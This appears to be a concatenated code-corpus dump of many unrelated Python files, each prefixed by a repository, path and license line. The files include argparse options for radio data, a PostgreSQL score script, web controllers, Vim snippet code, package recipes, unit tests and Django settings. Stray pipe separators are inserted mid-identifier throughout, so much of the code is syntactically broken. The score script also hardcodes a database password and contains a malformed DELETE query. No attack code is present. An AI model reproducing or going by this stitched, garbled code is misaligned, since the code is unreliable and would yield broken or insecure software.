default=[0.,2.7417,5.4833,2.7417,-2.7417,
-5.4833,-2.7417])
semi_opt.add_argument('--num_channels',type=int,
help | ='number of channels in observation',
default=2048)
semi_opt.add_argument('--bin_width',type=float,
help='width of analysis bins in MHz',
default=5.)
semi_opt.add_argument('--band_width',type=float,
help='width of band in MHz',
default=172.5)
semi_opt.add_argument('--rfi_con_width',type=int,
help='convolution half-width for RFI detection '+
'in channels',
default=1)
semi_opt.add_argument('--smooth_con_width',type=int,
help='convolution half-width for smoothing '+
'in time points',
default=28)
semi_opt.add_argument('--source_con_width',type=int,
help='convolution width for source '+
'detection in time points',
default=24)
semi_opt.add_argument('--edge_buff_chan',type=int,
help='channels to cut from convolution '+
'edge',
default=125)
semi_opt.add_argument('--edge_buff_time',type=int,
help='time points to cut from convolution '+
'edge',
default=52)
semi_opt.add_argument('--num_intervals',type=int,
help='number of intervals for calculating '+
'RFI mask',
default=10)
semi_opt.add_argument('--rfi_mask',type=float,
help='sigma for RFI cut',
default=6.)
semi_opt.add_argument('--source_mask',type=float,
help='sigma (SNR) for source cut',
default=8.)
semi_opt.add_argument('--sigma',type=float,
help='theoretical noise level in Kelvin',
default=0.017)
semi_opt.add_argument('--num_source_points',type=int,
help='number of points to fit around '+
'each source peak',
default=8)
semi_opt.add_argument('--point_sep',type=int,
help='number of points to skip in fiiting '+
'source (skips sidelobes)',
default=25)
semi_opt.add_argument('--num_outer_points',type=int,
help='number of points to fit to get '+
'baseline level',
default=5)
semi_opt.add_argument('--ast_offset',type=float,
help='fraction offset correction to AST '+
'coordinates and time',
default=0.5)
semi_opt.add_argument('--amp_req',type=float,
help='Source fit e_amplitude/amplitude requirement',
default=0.1)
semi_opt.add_argument('--width_req',type=float,
help='Source fit e_width/width requirement',
default=0.1)
# semi_opt.add_argument('--dec',type=float,nargs=2,
# metavar=('LOWER','UPPER'),
# help="analyze only this declination range, "+
# "inclusively, in degrees",
# default=[-90.,90.])
optional=parser.add_argument_group('other optional arguments:')
optional.add_argument('--exclude_channels',type=int,nargs='+',
help="channels to exclude")
optional.add_argument('-v','--verbose',help="verbose analysis",
action="store_true")
optional.add_argument('-f','--file_verbose',
help="make lots of intermediate files",
action="store_true")
args = vars(parser.parse_args())
main(**args)
|
goru47/INF1L-PRJ-2 | INF1L-PRJ-2/BattlePortDatabase.py | Python | mit | 2,314 | 0.013829 | #import modules
import psycopg2
# Connect to database
connection = psycopg2.connect(database="BattlePort", user="postgres", password="ivo123", host="127.0.0.1", port="5433")
print ("Opened database successfully")
cursor = connection.cursor()
# Tabel aanmaken
def create_table():
cursor.execute("CREATE TABLE IF NOT EXISTS Scores(pid integer, naam varchar(20), score integer, primary key (pid))")
# Data aan de tabel toevoegen
def data_entry(pid, naam, score):
connection = psycopg2.connect(database="BattlePort", user="postgres", password="ivo123", host="127.0.0.1", port="5433")
cursor = connection.cursor()
cursor.execute("insert into scores values(%s, %s, %s);", (pid, naam, score))
connection.commit()
cursor.close()
connection.close()
print("data added successfully")
# data uit de tabel printen
def kweerie(zoekopdracht):
cursor.execute(zoekopdracht)#selecteren
rows = cursor.fetchall()# kopieeren
for row in rows:
print("PID = ", row[0])
print("Naam = ", row[ | 1])
print("Score = ", row[2], "\n")
print("----------------------------------")
# database lezen
def read_database(zoekopdracht):
cursor.execute(zoekopdracht)#selecteren
#rows = cursor.fetchall()# kopieeren
for row in cursor.fetchal | l():
print(row)
#create_table()
#data_entry(730, 'jan', 304)
#data_entry(675, 'guus', 5677)
#kweerie("SELECT * FROM scores WHERE score > 9000")
#kweerie("SELECT * FROM scores WHERE score > 5000 AND score < 9000")
#kweerie("SELECT * FROM scores WHERE score < 5000")
#kweerie("SELECT * FROM scores order by score DESC ")
# Downloads the top score from database
def download_top_score():
result = kweerie("SELECT * FROM scores ORDER BY score DESC")
return result
def delete(pid, naam, score):
cursor.execute("DELETE FROM scores WHERE values(%s, '%s', %s), (pid,naam,score)")
#delete(156,'marnix', 9012)
#download_top_score()
cursor.execute("delete from scores * where score = 0;")
#cursor.execute("DELETE from scores where pid = 830;")
connection.commit
download_top_score()
kweerie("SELECT * FROM scores where naam = 'Default'")
#dfatabase = cursor.execute("DELETE FROM scores WHERE score = 0;")
|
buchuki/prickle | prickle/controllers/projects.py | Python | agpl-3.0 | 2,138 | 0.000935 | # Copyright 2010-2011 Dusty Phillips
# This file is part of Prickle.
# Prickle is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
# Prickle is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General
# Public License along with Prickle. If not, see
# <http://www.gnu.org/licenses/>.
import logging
from decimal import Decimal
from pylons.decorators import validate
from pylons import request, response, session, tmpl_context as c, url
from pylons.controllers.util import abort, redirect
from prickle.lib.base import BaseController, render
from prickle.model.timesheet import Timesheet, Project, ProjectType
from prickle.forms.timesheet import RateForm
log = logging.getLogger(__name__)
class ProjectsController(BaseController):
def list(self):
c.projects = Project.objects()
return render('/project/project_list.html')
def view(self, id):
c.project, created = Project.objects.get_or_ | create(name=id)
return render('/project/project_form.html')
|
@validate(schema=RateForm, form='view')
def edit(self, id):
project, created = Project.objects.get_or_create(name=id)
project.rate = self.form_result['rate']
project.save()
return redirect(url(controller="timesheet", action="index"))
@validate(schema=RateForm, form='view')
def type_rate(self, project, type):
project, created = Project.objects.get_or_create(name=project)
project_type, created = ProjectType.objects.get_or_create(
project=project, type=type)
project_type.rate = self.form_result['rate']
project_type.save()
return redirect(url(controller="timesheet", action="project",
id=project))
|
Insanityandme/dotfiles | vim/bundle/ultisnips/pythonx/UltiSnips/snippet/definition/_base.py | Python | unlicense | 14,330 | 0.000349 | #!/usr/bin/env python
# encoding: utf-8
"""Snippet representation after parsing."""
import re
import vim
import textwrap
from UltiSnips import _vim
from UltiSnips.compatibility import as_unicode
from UltiSnips.indent_util import IndentUtil
from UltiSnips.text import escape
from UltiSnips.text_objects import SnippetInstance
from UltiSnips.text_objects._python_code import \
SnippetUtilCursor, SnippetUtilForAction
__WHITESPACE_SPLIT = re.compile(r"\s")
def split_at_whitespace(string):
"""Like string.split(), but keeps empty words as empty words."""
return re.split(__WHITESPACE_SPLIT, string)
def _words_for_line(trigger, before, num_words=None):
"""Gets the final 'num_words' words from 'before'.
If num_words is None, then use the number of words in 'trigger'.
"""
if num_words is None:
num_words = len(split_at_whitespace(trigger))
word_list = split_at_whitespace(before)
if len(word_list) <= num_words:
return before.strip()
else:
before_words = before
for i in range(-1, -(num_words + 1), -1):
left = before_words.rfind(word_list[i])
before_words = before_words[:left]
return before[len(before_words):].strip()
class SnippetDefinition(object):
"""Represents a snippet as parsed from a file."""
_INDENT = re.compile(r"^[ \t]*")
_TABS = re.compile(r"^\t*")
def __init__(self, priority, trigger, value, description,
options, globals, location, context, actions):
self._priority = int(priority)
self._trigger = as_unicode(trigger)
self._value = as_unicode(value)
self._description = as_unicode(description)
self._opts = options
self._matched = ''
self._last_re = None
self._globals = globals
self._location = location
self._context_code = context
self._context = None
self._actions = actions
# Make sure that we actually match our trigger in case we are
# immediately expanded.
self.matches(self._trigger)
def __repr__(self):
return '_SnippetDefinition(%r,%s,% | s,%s)' % (
self._priority, self._trigger, self._description, self._opts)
def _re_matc | h(self, trigger):
"""Test if a the current regex trigger matches `trigger`.
If so, set _last_re and _matched.
"""
for match in re.finditer(self._trigger, trigger):
if match.end() != len(trigger):
continue
else:
self._matched = trigger[match.start():match.end()]
self._last_re = match
return match
return False
def _context_match(self, visual_content):
# skip on empty buffer
if len(vim.current.buffer) == 1 and vim.current.buffer[0] == "":
return
locals = {
'context': None,
'visual_mode': '',
'visual_text': '',
'last_placeholder': None
}
if visual_content:
locals['visual_mode'] = visual_content.mode
locals['visual_text'] = visual_content.text
locals['last_placeholder'] = visual_content.placeholder
return self._eval_code('snip.context = ' + self._context_code,
locals).context
def _eval_code(self, code, additional_locals={}):
code = "\n".join([
'import re, os, vim, string, random',
'\n'.join(self._globals.get('!p', [])).replace('\r\n', '\n'),
code
])
current = vim.current
locals = {
'window': current.window,
'buffer': current.buffer,
'line': current.window.cursor[0]-1,
'column': current.window.cursor[1]-1,
'cursor': SnippetUtilCursor(current.window.cursor),
}
locals.update(additional_locals)
snip = SnippetUtilForAction(locals)
try:
exec(code, {'snip': snip})
except Exception as e:
self._make_debug_exception(e, code)
raise
return snip
def _execute_action(
self,
action,
context,
additional_locals={}
):
mark_to_use = '`'
with _vim.save_mark(mark_to_use):
_vim.set_mark_from_pos(mark_to_use, _vim.get_cursor_pos())
cursor_line_before = _vim.buf.line_till_cursor
locals = {
'context': context,
}
locals.update(additional_locals)
snip = self._eval_code(action, locals)
if snip.cursor.is_set():
vim.current.window.cursor = snip.cursor.to_vim_cursor()
else:
new_mark_pos = _vim.get_mark_pos(mark_to_use)
cursor_invalid = False
if _vim._is_pos_zero(new_mark_pos):
cursor_invalid = True
else:
_vim.set_cursor_from_pos(new_mark_pos)
if cursor_line_before != _vim.buf.line_till_cursor:
cursor_invalid = True
if cursor_invalid:
raise RuntimeError(
'line under the cursor was modified, but ' +
'"snip.cursor" variable is not set; either set set ' +
'"snip.cursor" to new cursor position, or do not ' +
'modify cursor line'
)
return snip
def _make_debug_exception(self, e, code=''):
e.snippet_info = textwrap.dedent("""
Defined in: {}
Trigger: {}
Description: {}
Context: {}
Pre-expand: {}
Post-expand: {}
""").format(
self._location,
self._trigger,
self._description,
self._context_code if self._context_code else '<none>',
self._actions['pre_expand'] if 'pre_expand' in self._actions
else '<none>',
self._actions['post_expand'] if 'post_expand' in self._actions
else '<none>',
code,
)
e.snippet_code = code
def has_option(self, opt):
"""Check if the named option is set."""
return opt in self._opts
@property
def description(self):
"""Descriptive text for this snippet."""
return ('(%s) %s' % (self._trigger, self._description)).strip()
@property
def priority(self):
"""The snippets priority, which defines which snippet will be preferred
over others with the same trigger."""
return self._priority
@property
def trigger(self):
"""The trigger text for the snippet."""
return self._trigger
@property
def matched(self):
"""The last text that matched this snippet in match() or
could_match()."""
return self._matched
@property
def location(self):
"""Where this snippet was defined."""
return self._location
@property
def context(self):
"""The matched context."""
return self._context
def matches(self, before, visual_content=None):
"""Returns True if this snippet matches 'before'."""
# If user supplies both "w" and "i", it should perhaps be an
# error, but if permitted it seems that "w" should take precedence
# (since matching at word boundary and within a word == matching at word
# boundary).
self._matched = ''
words = _words_for_line(self._trigger, before)
if 'r' in self._opts:
try:
match = self._re_match(before)
except Exception as e:
self._make_debug_exception(e)
raise
elif 'w' in self._opts:
words_len = len(self._trigger)
words_prefix = words[:-words_len]
words_suffix = words[-words_len:]
match = (words_suffix == self._trigger)
if match and words_prefix:
# Require a word boundary between prefix and suffix.
boundary_ch |
tmerrick1/spack | var/spack/repos/builtin/packages/fyba/package.py | Python | lgpl-2.1 | 2,243 | 0.000446 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Fyba(AutotoolsPackage):
"""OpenFYBA is the source code release of the FYBA library, distributed
by the National Mapping Authority of Norway (Statens kartverk) to read
and write files in the National geodata standard format SOSI."""
homepage = "https://github.com/kartverket/fyba"
url = "https://github.com/kartverket/fyba/archive/4.1.1.tar.gz"
version('4.1.1', 'ab687582efdef26593796271529a10cb')
# configure: error: canno | t find install-sh or install.sh
force_autoreconf = True
depends_on('autoconf', type='bu | ild')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
# error: macro "min" passed 3 arguments, but takes just 2
# https://github.com/kartverket/fyba/issues/21
patch('gcc-6.patch')
# fatal error: 'sys/vfs.h' file not found
# https://github.com/kartverket/fyba/issues/12
patch('vfs-mount-darwin.patch', when='platform=darwin')
|
kamyu104/LeetCode | Python/range-addition-ii.py | Python | mit | 1,282 | 0.00156 | # Time: O(p), p is the number of ops
# Space: O(1)
# Given an m * n matrix M initialized with all 0's and several update operations.
#
# Operations are represented by a 2D array,
# and each operation is represented by an array with two positive integers a and b,
# which means M[i][j] should be added by one for all 0 <= i < a and 0 <= j < b.
#
| # You need to count and return the number of maximum integers
# in the mat | rix after performing all the operations.
#
# Example 1:
# Input:
# m = 3, n = 3
# operations = [[2,2],[3,3]]
# Output: 4
# Explanation:
# Initially, M =
# [[0, 0, 0],
# [0, 0, 0],
# [0, 0, 0]]
#
# After performing [2,2], M =
# [[1, 1, 0],
# [1, 1, 0],
# [0, 0, 0]]
#
# After performing [3,3], M =
# [[2, 2, 1],
# [2, 2, 1],
# [1, 1, 1]]
#
# So the maximum integer in M is 2, and there are four of it in M. So return 4.
# Note:
# The range of m and n is [1,40000].
# The range of a is [1,m], and the range of b is [1,n].
# The range of operations size won't exceed 10,000.
class Solution(object):
def maxCount(self, m, n, ops):
"""
:type m: int
:type n: int
:type ops: List[List[int]]
:rtype: int
"""
for op in ops:
m = min(m, op[0])
n = min(n, op[1])
return m*n
|
janezhango/BigDataMachineLearning | py/testdir_multi_jvm_fvec/test_KMeans_covtype20x_fvec.py | Python | apache-2.0 | 2,882 | 0.007634 | import unittest, time, sys, random
sys.path.extend(['.','..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_hosts, h2o_kmeans
import h2o_browse as h2b, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global localhost
localhost = h2o.decide_if_localhost()
if (localhost):
h2o.build_cloud(2,java_heap_GB=5)
else:
h2o_hosts.build_cloud_with_hosts()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_KMeans_covtype20x_fvec(self):
h2o.beta_features = True
if localhost:
csvFilenameList = [
# 68 secs on my laptop?
('covtype20x.data', 1200, 'cA'),
]
else:
# None is okay for hex_key
csvFilenameList = [
('covtype20x.data', 1200,'cA'),
# ('covtype200x.data', 1000,'cE'),
]
importFolderPath = "standard"
| for csvFilename, timeoutSecs, hex_key in csvFilenameList:
csvPathname = importFolderPath + "/" + csvFilename
# creates csvFilename.hex from file in importFolder dir
start = time.time()
parseResult = h2i.import_parse(bucket='home-0xdiag-datasets', path=csvPathname,
timeoutSecs=2000, hex_key=hex_key) # noise=('JStack', None)
print "parse end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2 | o.check_sandbox_for_errors()
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
k = 2
kwargs = {
'max_iter': 25,
'initialization': 'Furthest',
'k': k,
# reuse the same seed, to get deterministic results (otherwise sometimes fails
'seed': 265211114317615310,
}
start = time.time()
kmeans = h2o_cmd.runKMeans(parseResult=parseResult, \
timeoutSecs=timeoutSecs, retryDelaySecs=2, pollTimeoutSecs=60, **kwargs)
elapsed = time.time() - start
print "kmeans end on ", csvPathname, 'took', elapsed, 'seconds.', \
"%d pct. of timeout" % ((elapsed/timeoutSecs) * 100)
h2o_kmeans.simpleCheckKMeans(self, kmeans, **kwargs)
(centers, tupleResultList) = h2o_kmeans.bigCheckResults(self, kmeans, csvPathname, parseResult, 'd', **kwargs)
gs = h2o.nodes[0].gap_statistic(source=hex_key, k_max=8)
print "gap_statistic:", h2o.dump_json(gs)
if __name__ == '__main__':
h2o.unit_main()
|
michalliu/OpenWrt-Firefly-Libraries | staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/test/test_generators.py | Python | gpl-2.0 | 54,447 | 0.000404 | import gc
import sys
import unittest
import weakref
from test import support
class FinalizationTest(unittest.TestCase):
def test_frame_resurrect(self):
# A generator frame can be resurrected by a generator's finalization.
def gen():
nonlocal frame
try:
yield
finally:
frame = sys._getframe()
g = gen()
wr = weakref.ref(g)
next(g)
| del g
support.gc_collect()
self | .assertIs(wr(), None)
self.assertTrue(frame)
del frame
support.gc_collect()
def test_refcycle(self):
# A generator caught in a refcycle gets finalized anyway.
old_garbage = gc.garbage[:]
finalized = False
def gen():
nonlocal finalized
try:
g = yield
yield 1
finally:
finalized = True
g = gen()
next(g)
g.send(g)
self.assertGreater(sys.getrefcount(g), 2)
self.assertFalse(finalized)
del g
support.gc_collect()
self.assertTrue(finalized)
self.assertEqual(gc.garbage, old_garbage)
class ExceptionTest(unittest.TestCase):
# Tests for the issue #23353: check that the currently handled exception
# is correctly saved/restored in PyEval_EvalFrameEx().
def test_except_throw(self):
def store_raise_exc_generator():
try:
self.assertEqual(sys.exc_info()[0], None)
yield
except Exception as exc:
# exception raised by gen.throw(exc)
self.assertEqual(sys.exc_info()[0], ValueError)
self.assertIsNone(exc.__context__)
yield
# ensure that the exception is not lost
self.assertEqual(sys.exc_info()[0], ValueError)
yield
# we should be able to raise back the ValueError
raise
make = store_raise_exc_generator()
next(make)
try:
raise ValueError()
except Exception as exc:
try:
make.throw(exc)
except Exception:
pass
next(make)
with self.assertRaises(ValueError) as cm:
next(make)
self.assertIsNone(cm.exception.__context__)
self.assertEqual(sys.exc_info(), (None, None, None))
def test_except_next(self):
def gen():
self.assertEqual(sys.exc_info()[0], ValueError)
yield "done"
g = gen()
try:
raise ValueError
except Exception:
self.assertEqual(next(g), "done")
self.assertEqual(sys.exc_info(), (None, None, None))
def test_except_gen_except(self):
def gen():
try:
self.assertEqual(sys.exc_info()[0], None)
yield
# we are called from "except ValueError:", TypeError must
# inherit ValueError in its context
raise TypeError()
except TypeError as exc:
self.assertEqual(sys.exc_info()[0], TypeError)
self.assertEqual(type(exc.__context__), ValueError)
# here we are still called from the "except ValueError:"
self.assertEqual(sys.exc_info()[0], ValueError)
yield
self.assertIsNone(sys.exc_info()[0])
yield "done"
g = gen()
next(g)
try:
raise ValueError
except Exception:
next(g)
self.assertEqual(next(g), "done")
self.assertEqual(sys.exc_info(), (None, None, None))
def test_except_throw_exception_context(self):
def gen():
try:
try:
self.assertEqual(sys.exc_info()[0], None)
yield
except ValueError:
# we are called from "except ValueError:"
self.assertEqual(sys.exc_info()[0], ValueError)
raise TypeError()
except Exception as exc:
self.assertEqual(sys.exc_info()[0], TypeError)
self.assertEqual(type(exc.__context__), ValueError)
# we are still called from "except ValueError:"
self.assertEqual(sys.exc_info()[0], ValueError)
yield
self.assertIsNone(sys.exc_info()[0])
yield "done"
g = gen()
next(g)
try:
raise ValueError
except Exception as exc:
g.throw(exc)
self.assertEqual(next(g), "done")
self.assertEqual(sys.exc_info(), (None, None, None))
tutorial_tests = """
Let's try a simple generator:
>>> def f():
... yield 1
... yield 2
>>> for i in f():
... print(i)
1
2
>>> g = f()
>>> next(g)
1
>>> next(g)
2
"Falling off the end" stops the generator:
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "<stdin>", line 2, in g
StopIteration
"return" also stops the generator:
>>> def f():
... yield 1
... return
... yield 2 # never reached
...
>>> g = f()
>>> next(g)
1
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "<stdin>", line 3, in f
StopIteration
>>> next(g) # once stopped, can't be resumed
Traceback (most recent call last):
File "<stdin>", line 1, in ?
StopIteration
"raise StopIteration" stops the generator too:
>>> def f():
... yield 1
... raise StopIteration
... yield 2 # never reached
...
>>> g = f()
>>> next(g)
1
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
StopIteration
>>> next(g)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
StopIteration
However, they are not exactly equivalent:
>>> def g1():
... try:
... return
... except:
... yield 1
...
>>> list(g1())
[]
>>> def g2():
... try:
... raise StopIteration
... except:
... yield 42
>>> print(list(g2()))
[42]
This may be surprising at first:
>>> def g3():
... try:
... return
... finally:
... yield 1
...
>>> list(g3())
[1]
Let's create an alternate range() function implemented as a generator:
>>> def yrange(n):
... for i in range(n):
... yield i
...
>>> list(yrange(5))
[0, 1, 2, 3, 4]
Generators always return to the most recent caller:
>>> def creator():
... r = yrange(5)
... print("creator", next(r))
... return r
...
>>> def caller():
... r = creator()
... for i in r:
... print("caller", i)
...
>>> caller()
creator 0
caller 1
caller 2
caller 3
caller 4
Generators can call other generators:
>>> def zrange(n):
... for i in yrange(n):
... yield i
...
>>> list(zrange(5))
[0, 1, 2, 3, 4]
"""
# The examples from PEP 255.
pep_tests = """
Specification: Yield
Restriction: A generator cannot be resumed while it is actively
running:
>>> def g():
... i = next(me)
... yield i
>>> me = g()
>>> next(me)
Traceback (most recent call last):
...
File "<string>", line 2, in g
ValueError: generator already executing
Specification: Return
Note that return isn't always equivalent to raising StopIteration: the
difference lies in how enclosing try/except constructs are treated.
For example,
>>> def f1():
... try:
... return
... except:
... yield 1
>>> print(list(f1()))
[]
because, as in any function, return simply exits, but
>>> def f2():
... try:
... raise StopIteration
... except:
|
landscape-test/all-messages | messages/pylint/E0202.py | Python | unlicense | 47 | 0 | """
E0202
An att | ribute is hiding | a method
"""
|
simbuerg/benchbuild | benchbuild/tests/test_run.py | Python | mit | 2,638 | 0.000758 | """
This Test will run through benchbuild's execution pipeline.
"""
import os
import unittest
from contextlib import contextmanager
from benchbuild.utils import cmd
def shadow_commands(command):
def shadow_command_fun(func):
def shadow_command_wrapped_fun(self, *args, **kwargs):
cmd.__override_all__ = command
res = func(self, *args, **kwargs)
cmd.__override_all__ = None
return res
return shadow_command_wrapped_fun
return shadow_command_fun
class TestShadow(unittest.TestCase):
def test_shadow(self):
inside = None
true = cmd.true
mkdir = cmd.mkdir
class test_class(object):
@shadow_commands("true")
def shadow_hook(self):
return cmd.mkdir
outside = cmd.mkdir
inside = test_class().shadow_hook()
self.assertEqual(inside.formulate(), true.formulate(),
msg="true (before) is not the same as true (inside)")
self.assertNotEqual(mkdir.formulate(), inside.formulate(),
msg="mkdir (before) is not the same as mkdir (inside)")
self.assertNotEqual(inside.formulate(), outside.formulate(),
msg="true (before) is not the same as true | (after)")
self.assertEqual(mkdir.formulate(), outside.formulate(),
msg="mkdir (before) is not the same as mkdir (after)")
class TestRun(unittest.TestCase):
@shadow_commands("true")
def test_run(self):
from benchbuild import experimen | t
from benchbuild.utils.actions import Experiment
class MockExp(experiment.Experiment):
NAME = "mock-exp"
def actions_for_project(self, project):
from benchbuild.utils.actions import (
Prepare, Download, Configure, Build, Run, Clean)
inside = None
actns = []
project.builddir = "/tmp/throwaway"
actns = [Prepare(project),
Download(project),
Configure(project),
Build(project),
Run(project),
Clean(project)]
return actns
exp = MockExp(group="polybench")
eactn = Experiment(exp, exp.actions())
old_exists = os.path.exists
os.path.exists = lambda p: True
print(eactn)
eactn()
os.path.exists = old_exists
if __name__ == "__main__":
from benchbuild.utils import log
log.configure()
TestRun().test_run()
|
ScottyLabs/directory-api | input_parser.py | Python | mit | 2,729 | 0.004764 | import dir_search
from bs4.element import Tag
class Parser :
data : Tag or None
single : bool
error : bool
results : list[dict] or dict
def __init__(self, data : Tag):
self.data = data
if data is not None:
self.error = bool(data.findPrevious('p', class_="error"))
self.single = 'class' not in data.attrs
def parse_single(self):
if not self.single:
raise TypeError("Cannot parse multiple results")
self.results = {'listing': self.data.h1.text}
for entry in self.data.find_all | ("b"):
if entry.text == "Display Name:":
self.results['name'] = entry.next_sibling[1:]
if entry.text == "Email:":
se | lf.results['email'] = entry.next_sibling[1:]
if entry.text == "Andrew UserID:":
self.results['andrew_id'] = entry.next_sibling[1:]
if entry.text == "Advisor:":
self.results['advisor'] = entry.findNext().text
if entry.text == "Phone:":
self.results['phone'] = entry.next_sibling[1:]
if entry.text == "Job Title According to HR:":
self.results['job'] = entry.next_sibling.next_sibling.text
if entry.text == "Student Class Level:":
self.results['class_level'] = entry.next_sibling.next_sibling.text
if entry.text == "Student Class Level:":
self.results['class_level'] = entry.next_sibling.next_sibling.text
if entry.text == "Department with which this person is affiliated:":
dep = []
for i in entry.nextSiblingGenerator():
if i.name != 'br' and i.name is not None:
break
elif i.name is None:
dep.append(i.text)
self.results['department'] = dep
def parse_multi(self):
if self.single:
raise TypeError("Result is not tabular")
rows = self.data.find_all('tr')
self.results = []
keys = ['last', 'first', 'andrew_id', 'affiliation', 'department']
for r in rows[1:]:
self.results.append(dict(map(lambda e : (e[0], e[1].text), zip(keys, r.find_all('td')))))
def parse(self):
if self.data is None:
self.results = None
elif self.single:
self.parse_single()
else:
self.parse_multi()
if __name__ == "__main__":
# result = dir_search.basic("david")
# print(result.error)
# for idx, val in enumerate(result.contents):
# print(idx, " ", val)
p = Parser(dir_search.basic("brandon"))
p.parse()
print(p.results)
|
pando85/django-registration | test_app/settings_test.py | Python | bsd-3-clause | 1,575 | 0 | # coding: utf-8
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ' | :memory:',
},
}
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.sites',
'django.contrib.sessions',
'django.contrib.contenttypes',
'registration',
'test_app',
)
DEBUG = True
ALLOWED_HOSTS = ['*']
SECRET_KEY = '_'
SITE_ID = 1
ROOT_URLCONF = 'test_app.urls_admin_approval'
TEMPLATES = | [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.app_directories.Loader',
],
},
},
]
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ADMINS = (
('admin1', 'admin1@mail.server.com'),
('admin2', 'admin2@mail.server.com'),
)
|
v-legoff/pa-poc3 | src/controller/controller.py | Python | bsd-3-clause | 3,681 | 0.000543 | # Copyright (c) 2012 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module defining the Controller class, described below."""
import cherrypy
from formatters import formats
from model.exceptions import ObjectNotFound
class Controller:
"""Class describing a controller, wrapper for actions.
A controller is a class containing methods that will act as actions. If a
route is connected to an action of a controller (a method of the class),
then it will be called when a request is sent to this route.
"""
server = None
def __init__(self, bundle):
"""Build the controller."""
self.bundle = bundle
@property
def request(self):
"""Return the serving Cherrypy request."""
return cherrypy.serving.request
@property
def requested_format(self):
"""Return the requested format."""
path = self.request.path_info
format = path.split(".")[-1]
if len(format) == len(path):
# The format is not defined
format = ""
return format
@staticmethod
def authenticated(function):
"""Prevent any no-logged-in users to access the action."""
def callable_wrapper(controller, *args, **kwargs):
"""Wrapper of the controller."""
if controller.server.authenticated():
return function(controller, *args, **kwargs)
return "You are not logged in."
return callable_wrapper
def render(self, view, **representations):
"""Render datas using the formatters."""
format = self.requested_format
if not format:
format = self.server.default_format
if format not | in self.server.allowed_formats:
return "Unknown format {}.".format(format)
return formats[format].render(view, **representations)
def get_cookie(self, name, value=None):
"""Return, if found, the cookie.
Otherwise, return value.
"""
return self.server.get_cookie(name, value)
def set_cookie(self, name, value, max_age, path="/", versio | n=1):
"""Set a cookie."""
self.server.set_cookie(name, value, max_age, path, version)
|
canfar/cadcstats | svc_plots/tomcat_old.py | Python | mit | 24,867 | 0.08461 | from elasticsearch import Elasticsearch, TransportError
from elasticsearch.helpers import scan
